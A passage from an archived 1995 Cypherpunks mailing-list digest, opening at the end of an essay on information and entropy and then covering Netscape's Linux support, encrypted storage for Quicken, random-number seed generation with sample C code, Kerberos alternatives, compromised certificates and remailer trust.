turn Wicken's argument on its head, we might say he recognizes that
metaphors in general, and the information-entropy connection in
particular, directly threaten science's ability to separate ideas from
the language it uses to express them.

In his anxiety to suppress the metaphoric potential of Shannon's choice,
Wicken misses the richly complex and suggestive connections that were
instrumental in enabling a new view of chaos to emerge.  By the simple
device of using "information" and "entropy" as if they were interchan-
geable terms, Shannon's choice gave rise to decades of interpretative
commentary that sought to explain why information should be identified
with disorder rather than order.  For the alliance between entropy and
information to be effective, information first had to be divorced from
meaning (a premise made explicit in Shannon's 1948 papers) and had to
be associated instead with novelty.  Recall the random number generator,
mentioned earlier, that produces a tape we can read.  No matter how long
we watch the tape, numbers keep appearing in unpredictable sequence.
From one point of view this situation represents chaos; from another,
maximum information.

Once randomness was understood as maximum information, it was possible
to envision chaos (as Robert Shaw does) as the source of all that is
new in the world.  Wicken is correct in noting that denotative and
connotative fields overlap; in the case of information, the connotation
that "intruded" upon the denotative field of chaos was complexity.
Whereas chaos had traditionally meant simply disorder, complexity
implied a mingling of symmetry with asymmetry, predictable periodicity
with unpredictable variation.  As we have seen, chaotic or complex
systems are disordered in the sense that they are unpredictable, but
they are ordered in the sense that they possess recursive symmetries
that almost, but not quite, replicate themselves over time.  The
metaphoric joining of entropy and information was instrumental in
bringing about these developments, for it allowed complexity to be
seen as rich in information rather than deficient in order.

Sources cited:

K. G. Denbigh and J. S. Denbigh, _Entropy in Relation to Incomplete
Knowledge_ (Cambridge University Press, 1985)
                                             
Jeffrey S. Wicken, "Entropy and Information:  Suggestions for a
Common Language."  Philosophy of Science 54:176-193  (1987)
==================================================================

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Sun, 24 Sep 95 13:28:33 PDT
To: paquin@netscape.com (Tom Paquin)
Subject: Re: Netscape for Linux?
In-Reply-To: <3064BDFB.717F@netscape.com>
Message-ID: <199509242006.PAA02258@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support, 
> 
> I have no current plans to alter our treatment of Linux.  It is not now,
> nor has it ever been, a supported platform.  We do build for it,
> and some people are happy about that.

Does this mean that a Linux version of Netscape will no longer be 
available, or that it *will* be available but unsupported?

> I have not constructed a business case which would cause Netscape
> to begin support for Linux versions of the Navigator.  Right now, I'm 
> not sure that making a point of this would do what you want.

That all depends on what you mean by "support".  If you mean "we will no 
longer make Netscape available for the Linux platform", that's not 
support.  If you mean "we will no longer respond to bug reports for 
Netscape on this platform" then that's discontinuing support.

Please be more specific in your postings?

As a project manager and developer, I have constructed many a business 
case for the development and/or support for products - such a case could 
easily be made for Linux support for Netscape, irrespective of what you 
mean by "support".
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGW6JSS9AwzY9LDxAQElggP9Gy4h5OYkfQqtE0yi4K8rng1C3G/vgr0S
EOfUdFaiw8pewcjgxe4ZqtDyxAeeRGgEYjmAQLA5739xjExCGL45O4OnYMopGDzd
Sfmi557I/qJib1utfE51wkUjqyxutTceb4UDUmUS0TOs/kMCf6DXTvNePRLxVtm4
rW1C9BfDClk=
=kj39
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 24 Sep 95 12:28:42 PDT
To: lethin@ai.mit.edu (Rich Lethin)
Subject: Re: macworld crypto articles
In-Reply-To: <199509241745.NAA20271@toast.ai.mit.edu>
Message-ID: <199509241924.PAA18525@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


| For the next version, include PGP free with every version of Quicken,
| and have Quicken just "call" PGP.
| 
| Of course, users can encrypt their files now with PGP.  Is there an
| Intuit bboard where someone could post instructions?

	Of course, it would be *much* easier to store Quicken + data
files on an encrypted filesystem (Cryptdisk or SFS).  To start
quicken, the user starts Cryptdisk, runs Quicken on his encrypted
files (now transparently available), and then quits.  Cryptdisk
disappears 5 minutes later.

	Thus, Intuit isn't putting crypto calls which might be illegal
into their code.  They maintain a single code base, a single version
in the warehouses, and continue to lobby Congress to change the laws.

	(Quicken gets stored on the encrypted area so that it won't
start up and say 'where are my data files?')

	Naturally, this works with programs other than Quicken.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Sun, 24 Sep 95 13:45:22 PDT
To: wb8foz@nrk.com
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <199509232229.SAA00612@nrk.com>
Message-ID: <199509242029.PAA02731@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> As a hardware type, I'd prefer a diode noise generator over a
> radioactivity detector. I'd hate for the Fort to be tempted to fudge the
> latter's output by flooding my house from a black helicopter...

No, they'll just flood it with RF and force your diode to act as a 
detector - then they can feed you anything they like ;)

I learned the hard way - keep the transmitters away from a reverse-biased 
doide acting as a noise generator.  Only until I examined the output did 
I realize it wasn't random.  I fixed it, though, by looking at the output
and testing its randomness.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGW/mSS9AwzY9LDxAQGc4gQAjwszSdrT188RrvbTnp9ywwJ99ppixEef
V9m59O169LIh4YwIejicJbO7/zC5t99gs15ZnbTWXZim8r+04XrR3AFyRnQFTDfJ
WmYmW6gHWR40xBxgVMFUydz9TsZqCxGb+iVQRTeteodgMr6x+zbJ0qa8FWy4UNLr
iYfFbjH+okg=
=Qv+f
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: beckman@cs.hope.edu (Peter Beckman)
Date: Sun, 24 Sep 95 12:46:03 PDT
To: cypherpunks@toad.com
Subject: Kerberos
Message-ID: <9509241945.AA07710@atlantis.cs.hope.edu>
MIME-Version: 1.0
Content-Type: text/plain


We are studying kerberos, the security system implemented by MIT's Athena network.
Has anyone started, considered, imagined or completed any similar security 
systems, preferably using public key cryptography (as opposed to a single 56-bit
DES key)?  

Please mail any responses to beckman@cs.hope.edu.
-- 
Peter Beckman
Hope College              
beckman@cs.hope.edu           
http://www.cs.hope.edu/~beckman/   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Sun, 24 Sep 95 13:32:59 PDT
To: cypherpunks@toad.com
Subject: Re: Kerberos
In-Reply-To: <9509241945.AA07710@atlantis.cs.hope.edu>
Message-ID: <199509242029.QAA26489@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 24, 15:45, Peter Beckman sent the following to the NSA's mail
archives:
> Subject: Kerberos
|| We are studying kerberos, the security system implemented by MIT's
Athena network.
|| Has anyone started, considered, imagined or completed any similar
security
|| systems, preferably using public key cryptography (as opposed to a
single 56-bit
|| DES key)?
||

The Open Software Foundation's Distributed Computing Environment has the
concept of a central security registry (which is currently based on
Kerberos).  I haven't delved too deeply into them, but the OSF website has
some DCE RFCs about adding public key capabilities to the registry.  They
should be off the OSF home page somewhere at <http://www.osf.org>.

	David

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Sun, 24 Sep 95 13:45:04 PDT
To: cypherpunks@toad.com
Subject: Piggybacking
Message-ID: <199509242044.QAA15210@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



In article <444bp8$sd4@life.ai.mit.edu> Adam writes:
>	Naturally, this works with programs other than Quicken.

By leveraging on the popularity of Quicken and people's insecurities
about their financial data cypherpunks might be able to spread PGP and
SecureDrive technology more rapidly.

If I were a marketing manager at a startup selling SecureDrive, for
example, I'd suggest trying to exploit the above by selling my product
as "QuickxxSecure" which would install after Quicken, make the secure
drive, move quicken there, etc.  It would then sell in a box with a
graphical design (e.g. white stripe on red box, to blend nicely with
Intuit's red on white) that Egghead would want to put it on the shelf
right next to Quicken.

Cypherpunks with a crypto-anarchic agenda might "package" shareware in
a way that would exploit the same principles.  Surely, a bigger market
than people using EMACS RMAIL. 

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: donner@ny.ubs.com (Marc Donner)
Date: Sun, 24 Sep 95 14:11:52 PDT
To: cypherpunks@toad.com
Subject: change of address notice for Marc Donner
Message-ID: <9509242111.AA21917@ikura.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear colleague, friend, or correspondent,

My new business address is:

   Marc Donner
   Union Bank of Switzerland
   299 Park Avenue
   New York, NY 10171

   212-821-6229

You can send me email at:

   donner@ubss.com

The destination list for this mail is gleaned from an automated
analysis of many megabytes of mail that I have accumulated over the
last three years.  In some cases you are receiving this not because we
are acquaintances or correspondents but because you were a recipient of
some piece of mail that I also received and kept.  If so, I apologize
for the intrusion.  I have pruned the list extensively, but some email
IDs are sufficiently opaque that I cannot reliably identify the person
at the other end.

Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Sep 95 14:21:26 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: "Going after Netscape"
In-Reply-To: <199509232003.QAA11668@book.hks.net>
Message-ID: <199509242121.RAA08234@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> >> So, keep on "attacking" Netscape (kudos to Ray, by the way,
> >> though I've seen Netscape bomb on certain sites, as with the
> >> Cypherpunks archive site, as several of us noted a few months
> >> ago...probably a different problem, but indicative that Netscape
> >> can be corrupted). But let's be careful not to convey any flavor
> >> of this being a vendetta.
> >
> >I agree. The goal is not to kill Netscape but to make the net
> >secure.
> 
> Absolutely. We aren't on a vendetta. We want to make the net secure for
> privacy.

Agreed. My main purpose in harrassing Netscape is that I have to live
with customers who insist on using it and I want them to be safe. If
that means having to attack it enough that the the press starts
noticing and management starts paying attention as a result, so be it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 24 Sep 95 17:38:13 PDT
To: cypherpunks@toad.com
Subject: Netscape giving away T-shirts?
Message-ID: <199509250033.RAA28349@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	My ex-gf just told me on the phone that her boss mentioned
that Netscape was giving away T-shirts to people who found holes.
Apparently her boss saw this on the news. Interesting. ;-)

	(For the over-stressed and/or humor-impaired: I'm not implying
that netscape is giving away t-shirts, just commenting on the accuracy
of the media.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Sun, 24 Sep 95 15:09:16 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <199509240243.WAA00266@hoopsnake.cjs.net>
Message-ID: <m0swzFk-000xhVC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that Christopher J. Shaulis wrote:

[snipped]
> You have also turned numerous other attempts by varionus people to buy
> both quantities of navigaors and server software for Linux.
> 
> It seems to me that you folks are going out of your way to deny the
> fact that the Linux market exists. I think that its because you are
> embarassed that all these people with a $20 operating system are
> throwing money at you while all the folks with $10K operating systems
> aren't talking to you at all. 
> 
> While you may WANT to have all your sales be for OSF/1 machines or
> solaris, but refusing to support Linux and ignoring the demand for
> your products by the Linux community just because you don't think it
> would sound as impressive, is actually quite childish and doesn't make
> any financial sense.
> 
> Christopher

You tell'em Christopher! 

I have turned on quite a few of my friends to Linux. 
Some are Engineers and Programmers in businesses that would love to add
Netscape navigator and server. Hell, I would too.

Screw 'em. If they want to be the defacto standard for *some* OS's but
not all, someone else will come along and fill in the gap.
Besides, they already made the point that they don't want to make money
so why change the status quo. All the more reason to show the weaknesses
of the product before others get sucked in.
I'll stick to TkWWW and Lynx thank you.

- -- 
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAgUBMGXXKLbmxeO+s+1xAQF7BwP9GrZe0+DULZegVjPJB7iiLagq8dnY3QLs
J26v2pARiZyyLBZgpBgzenXv8I0nwAL4UnDREWnOOunC3RdM0o5+ROM34tSnhdfM
4T4xEUXHp2CSI98VAkhSqKgnWZEACSeDAcx2gT7jGneAhRPO/VCQkZfz3SquRiHO
4RumiNsnInA=
=TuK+
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 24 Sep 95 18:25:28 PDT
To: cypherpunks@toad.com
Subject: Important consequence of existence of compromised Netscape certificates
In-Reply-To: <199509242121.RAA08234@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950924182101.12733D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


There's one very important side-effect of the existence of a large number 
of compromised certificates accepted by navigator: the upgraded clients 
must either do CRL processing, or the roots used to sign all possibly 
compromised keys *must*  be rejected by the fixed navigator. 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Sun, 24 Sep 95 18:28:23 PDT
To: steven ryan <sryan@reading.com>
Subject: Re: Crypto in Wired
Message-ID: <v01530500ac8bc31dd0aa@[199.171.88.78]>
MIME-Version: 1.0
Content-Type: text/plain


>Good issue of Wired this month (10/95)
>
>Vic Sussman has a half page on PGPfone. Asked why he's giving away PGPfone
>with an inditement hanging over his head Zimmermann says "... I am a
>cryptographer. This is what I do".

You need the full quote to get the real effect:

<<Why is Zimmermann giving away voice-crypto when the feds are still
dangling an indictment over his head? "Because it's still legal for
Americans to hold a private conversation," he says. "And because I'm a
crypographer. This is what I do.">>

That is a remarkably concise, intelligent, informative, unequivocal, savvy,
and personal statement. Hats off to PZ (or whoever told him to say that).



-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 24 Sep 95 15:53:56 PDT
To: Richard Martin <rmartin@aw.sgi.com>
Subject: Re: `Random' seed.
In-Reply-To: <9509200915.ZM14792@glacius.alias.com>
Message-ID: <9509242252.AA03400@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: Richard Martin <rmartin@aw.sgi.com>
    Date: Wed, 20 Sep 1995 09:15:49 -0400

    Vaporware which I heard around CFP '95, and have been sort of
    wondering about ever since...

    Some one told me that some one else [possibly Matt Blaze] had been
    looking at how much randomness could be got by forking two child
    processes which would just run as asynchronous clocks: whenever
    the parent program needs a little `random' bit, it queries both
    and gives (clock(A) + clock(B) % 2) or something.

I've played around with something that Matt posted here a while back
which seems to use the same idea.  Matt suggested that this appears to
emit one random bit per second.  I've done some very lightweight
analysis and haven't seen anything to suggest that the output is not
random, but I wouldn't make any bets based on what I've done.

FWIW, I discussed this code briefly with an engineer at Netscape a
while back . . . .

			Rick

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
/* -*- Mode: C -*- */

/*********************************************************************

This is from a message on the Cypherpunks mailing list:

 Posted-Date: Fri, 20 Jan 95 03:36:17 -0500
 Message-Id: <9501200836.AA19977@merckx.info.att.com>
 To: cypherpunks@toad.com
 Subject: Re: Threats in real life - what are we worried about? 
 Date: Fri, 20 Jan 95 03:36:17 -0500
 From: Matt Blaze <mab@research.att.com>

*********************************************************************/

#include <stdio.h>
#include <signal.h>
int count=0;
void printbit()
{
	signal(SIGALRM,printbit);
	alarm(1);
	printf("%1d",count&01);
	fflush(stdout);
}
main()
{
	signal(SIGALRM,printbit);
	alarm(1);
	while (1)
		count++;
}

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGXhPZNR+/jb2ZlNAQEkdgQAlVBgpN8LLeb9TM0dhy1Bx7KXfHCiIqV6
UoLRm/hoEzsiOnGbJeNlx2n1dyxdmti/Zvacnsi2CAKHhJGAaARcQGy+hWc6uS3v
nbOqOoFkvRlWYyYV6QLgvKckYM+tbYBvrjQgQ/XivpoPQPbzyRI6cW4soLuJ7fpu
xug5C8yYc8A=
=dT9a
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bret@bjohns.win.net (Bret A. Johnson)
Date: Sun, 24 Sep 95 16:32:56 PDT
To: paquin@netscape.com (Tom Paquin)
Subject: Re: Netscape for Linux?
Message-ID: <1895@bjohns.win.net>
MIME-Version: 1.0
Content-Type: text/plain


 
>> > And the sad part is that now that they have announced that they are
>> > dropping their unofficial Linux support, 
>> 
>> I have no current plans to alter our treatment of Linux.  It is not now,
>> nor has it ever been, a supported platform.  We do build for it,
>> and some people are happy about that.
>>
>> I have not constructed a business case which would cause Netscape
>> to begin support for Linux versions of the Navigator.  Right now, I'm 
>> not sure that making a point of this would do what you want.
>
>I'll say some people are happy about it. 
>
>You just recently turned down an order for 230 copies of the netscape
>navigator for Linux, and as you folks aren't making any money, you can
>only wonder why.
>
>You have also turned numerous other attempts by varionus people to buy
>both quantities of navigaors and server software for Linux.
>
>It seems to me that you folks are going out of your way to deny the
>fact that the Linux market exists. I think that its because you are
>embarassed that all these people with a $20 operating system are
>throwing money at you while all the folks with $10K operating systems
>aren't talking to you at all. 

That is ok! I just called there "Sales" dept. and asked for some info.
to be sent to me on there serevers.  I got 5 copies of what is on the
WEB page. I could have done that.  I asked him for prices and told him
this was to present to a group of Marketing and Buss. type for a
community system to bring Internet access to a whole county that does
not have it now..

BTW, the system will be running on Suns and SGI's.....

Oh well..

I thought they would do better than this. So far, there no better then
sun at customer service...

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sun, 24 Sep 95 16:28:14 PDT
To: cypherpunks@toad.com (C'Punk List)
Subject: Snake Oil (was: macworld crypto article)
In-Reply-To: <v01530501ac8b23d65a53@[166.84.250.21]>
Message-ID: <199509242327.TAA06477@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dave Mandl wrote about some lame Mac crypto thing...
[..]
> Yup, pretty amazing.  I only skimmed the article, but I believe that out of
> all the programs he tried, there was only one whose crypto he couldn't
> crack.  I found it all a little hard to believe.  I mean, even if they used
> the most obsolete algorithm, wouldn't you have to know _something_ about
> cryptanalysis to crack it?  Are these vendors just putting a "this file is
> locked with this such and such a password" string at the front of the file,
> or what?

[..]

Sounds like it's time for a Snake-Oil FAQ...

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Sun, 24 Sep 95 16:59:54 PDT
To: cypherpunks@toad.com
Subject: Crypto in Wired
Message-ID: <199509250000.UAA10758@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Good issue of Wired this month (10/95)

Vic Sussman has a half page on PGPfone. Asked why he's giving away PGPfone
with an inditement hanging over his head Zimmermann says "... I am a
cryptographer. This is what I do".

Banking with First Virtual by Andrew Leonard

Anonymous Speech by Tom Bell

Data Dicks by John Whalen
 Did you know you can recover data on magnetic media that's been written
over up to nine times? These guys do - for a living.

Wanna Bet by Evan I Schwartz
 Guess what's going to be the next killer app on the net.

Steven
Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Freedom Remailer <mixmaster@gondolin.org>
Date: Sun, 24 Sep 95 18:14:30 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509250105.UAA11700@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain


Post: Spy Agency Hoards Secret $1 Billion

WASHINGTON (AP) - The super secret agency that manages the nation's spy satellite program has built up unspent funds totaling more than $1 billion
without informing Congress or even its supervisors at the Pentagon and CIA, according to a published report.

The Washington Post cited unidentified Capitol Hill sources in Sunday editions as saying the ability of the National Reconnaissance Organization to put
away so much money from its classified multibillion-dollar budget reaffirmed concerns that intelligence agencies sometimes use their secret status to avoid
accountability.

The Post said the funds, called a "pot of gold" by one Senate aide, were discovered after the Senate intelligence committee raised questions more than a year
ago about a $300 million new headquarters building the agency was building in suburban Virginia.

The committee determined that the agency, not generally known to Congress, was using base operating funds it already had without seeking a specific
appropriation for the building.

The pool of unspent money accumulated as a result of NRO's practice of having Congress pay in advance for multiyear, billion-dollar-plus satellite
programs, the Post quoted CIA Director John Deutch as saying in an interview. Agency managers let incoming funds pile up when spending on contracts took
place at a slower pace than planned.

Although he said a CIA inquiry found nothing illegal about how the NRO handled the money, Deutch told the Post he put a new chief financial officer in at
the agency and ordered a "separate budget scrub" of all its programs.

NRO's funding is part of the Pentagon budget, but many of the agency's intelligence programs are under CIA supervision.

The Post said one congressional aide put the total of unspent funds as high as $1.7 billion, but that others said it could turn out to be less than $1 billion.

It said Deutch declined to put a figure on the unspent money.

Story Number: 00598 Story Date: 9/23/95

This material may not be redistributed. Copyright 1995. The Associated Press. All rights reserved. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 24 Sep 95 17:05:32 PDT
To: cypherpunks@toad.com
Subject: Re: `Random' seed.
Message-ID: <199509250016.UAA19204@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> I've played around with something that Matt posted here a while back
> which seems to use the same idea.  Matt suggested that this appears to
> emit one random bit per second.  I've done some very lightweight
> analysis and haven't seen anything to suggest that the output is not
> random, but I wouldn't make any bets based on what I've done.

Here's my current favorite quick-and-dirty true-random-in-software generator.
Use at own risk and read the comments carefully...

-matt
===================cut here===========================
/*
 *	Physically random numbers (very nearly uniform)
 *	D. P. Mitchell 
 *	Modified by Matt Blaze 2/95
 */
/*
 * The authors of this software are Don Mitchell and Matt Blaze.
 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software may be subject to United States export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
 */

/*
 * WARNING: depending on the particular platform, truerand() output may
 * be biased or correlated.  In general, you can expect about 16 bits of
 * "pseudo-entropy" out of each 32 bit word returned by truerand(),
 * but it may not be uniformly diffused.  You should therefore run
 * the output through some post-whitening function (like MD5 or DES or
 * whatever) before using it to generate key material.  (RSAREF's
 * random package does this for you when you feed truerand() bits to the
 * seed input function.)
 *
 * Test these assumptions on your own platform before fielding a system
 * based on this software or these techniques.
 *
 * This software seems to work well (at 16 bits per truerand() call) on
 * a Sun Sparc-20 under SunOS 4.1.3 and on a P100 under BSDI 2.0.  You're
 * on your own elsewhere.
 */

#include <signal.h>
#include <setjmp.h>
#include <sys/time.h>
#include <math.h>
#include <stdio.h>

static jmp_buf env;
static unsigned count;
static unsigned ocount;
static unsigned buffer;

static int
tick()
{
	struct itimerval it, oit;

	timerclear(&it.it_interval);
	it.it_value.tv_sec = 0;
	it.it_value.tv_usec = 16665;
	if (setitimer(ITIMER_REAL, &it, &oit) < 0)
		perror("tick");
}

static void
interrupt()
{
	if (count)
		longjmp(env, 1);
	(void) signal(SIGALRM, interrupt);
	tick();
}

static unsigned long
roulette()
{

	if (setjmp(env)) {
		count ^= (count>>3) ^ (count>>6) ^ ocount;
		count &= 0x7;
		ocount=count;
		buffer = (buffer<<3) ^ count;
		return buffer;
	}
	(void) signal(SIGALRM, interrupt);
	count = 0;
	tick();
	for (;;)
		count++;	/* about 1 MHz on VAX 11/780 */
}

unsigned long
truerand()
{

	count=0;
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	(void) roulette();
	return roulette();
}

int
n_truerand(n)
int n;
{
	int slop, v;

	slop = 0x7FFFFFFF % n;
	do {
		v = truerand() >> 1;
	} while (v <= slop);
	return v % n;
}







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 24 Sep 95 18:08:22 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Cybersecurity
In-Reply-To: <Pine.SUN.3.91.950921061134.12901A-100000@panix.com>
Message-ID: <9509250107.AA05910@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Thu, 21 Sep 1995 06:13:40 -0400 (EDT)
    From: Duncan Frissell <frissell@panix.com>

    On Thu, 7 Sep 1995 hallam@w3.org wrote:

    > The UK laabour party is opposed to key escrow "we do not accept
    > the "clipper chip" argument". The Tories have less than half the
    > level of popular support an are barely recognisable as a
    > government.
    > 
    >         Phill

    Wait till Labour finds out that crypto makes "The Caring Society" 
    impossible.  Perhaps they'll change their view then.

Ok, I'll bite.  What do you mean?

I'm guessing that you're talking about the fact that fully applied
crypto (e. g. fully anonymous digital cash) makes it essentially
impossible to base a tax system on income.

With full application in place, a government would be forced to shift
the basis of the tax system toward `real assets' and the receiving of
goods and services within its borders.  However, outside of
transactions involving pure information exchange, this simply shifts
things from one side to the other in a relationship where the basic
ideas behind capitalism suggest that both sides should be more or less
equal.  That is, you're not taxed based on money changing hands, but
rather on the more tangible things that are the reason for the money
changing hands.  To use the over-used grocery store example, you're
taxed on what you carry out in your basket, without regard to any
money that may or may not have changed hands before during or after
you went to the store.

Earnings tend to correlate reasonable well with receiving goods and
services, at least over long periods of times.  Also most people are
more or less tied to a certain area of the world.  Certainly there are
exceptions, but the average case is more relevent when considering
what sorts of governmental policies are possible.  Given this, I think
that crypto is more likely to result in a readjustment of the details
than a fundamental change in the relationships between various
elements of society.  I don't mean to suggest that these relationships
can't or won't change, just that strong crypto is not a magic pill
that can transform everything by itself.  Fundamental changes are the
results of the interplay of a wide array of forces.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Freedom Remailer <mixmaster@gondolin.org>
Date: Sun, 24 Sep 95 19:49:38 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509250241.VAA12182@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain


> Newsgroups: alt.privacy.anon-server
> From: shamrock@netcom.com (Lucky Green)
> Subject: The subtle danger of using Mixmaster
> Message-ID: <shamrock-2409951151310001@192.0.2.1>
> Sender: shamrock@netcom19.netcom.com
> Organization: NETCOM On-line Communication Services (408 261-4700 guest)
> X-Newsreader: Yet Another NewsWatcher 2.0
> Date: Sun, 24 Sep 1995 19:51:30 GMT
> Lines: 19
> 
> There are about twenty Mixmaster remailers. Reason to celebrate? Hardly.
> Though we have more remailers than ever, I doubt that the twenty or so
> Mixmasters are operated my more than six or seven people. I would not be
> surprised to find out that some folks are running several Mixmasters on
> the _same_ machine, using different IP addresses.
> 
